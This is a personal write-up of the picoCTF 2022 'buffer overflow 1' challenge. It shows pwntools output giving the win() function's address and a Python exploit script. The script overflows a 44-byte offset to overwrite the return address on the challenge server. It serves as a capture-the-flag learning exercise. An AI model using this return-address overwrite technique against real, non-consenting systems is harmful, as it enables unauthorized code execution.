buffer overflow 1
Description
Control the return address
Now we're cooking! You can overflow the buffer and return to the flag function in the program.
You can view source here. And connect with it using nc saturn.picoctf.net 51721
Info
The links could be different.. the instance will be different (you have to launch your own in CTF)
Solving
This is a "normal" buffer overflow, not a really hard one. That is propably why even I could solve it 🙂 . We just need to change address of the return address to the address of the win(). To get this address I used the pwntools and the interactive python shell.
python
Python 3.10.2 (main, Jan 15 2022, 19:56:27) [GCC 11.1.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> vuln = ELF('vuln')
[*] '/home/ulli/Documents/CTF/picoCTF2022/binary_exploitation/buffer_overflow1/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
>>> p32(vuln.symbols['win'])
b'\xf6\x91\x04\x08'After I had everything I needed, I created a short script (standard script from tryhackme I think) to do the dirty work 🙂 .
#!/usr/bin/env python
from pwn import *
host,port = 'saturn.picoctf.net', 56565
prefix = ""
offset = 44
overflow = "A" * offset
retn = ""
padding = ""
payload= "\xf6\x91\x04\x08"
postfix = ""
buffer = bytes(prefix + overflow + retn + padding + payload + postfix,"latin-1")
try:
s = remote(host, port)
print(s.recvuntil(b'string:'))
print("Sending evil buffer...")
print("Buffer: " + str(buffer))
s.sendline(buffer)
s.recv()
s.recv()
flag = s.recv().decode('utf-8')
print("Flag: " + flag)
print("Done!")
except:
print("Could not connect.")
s.close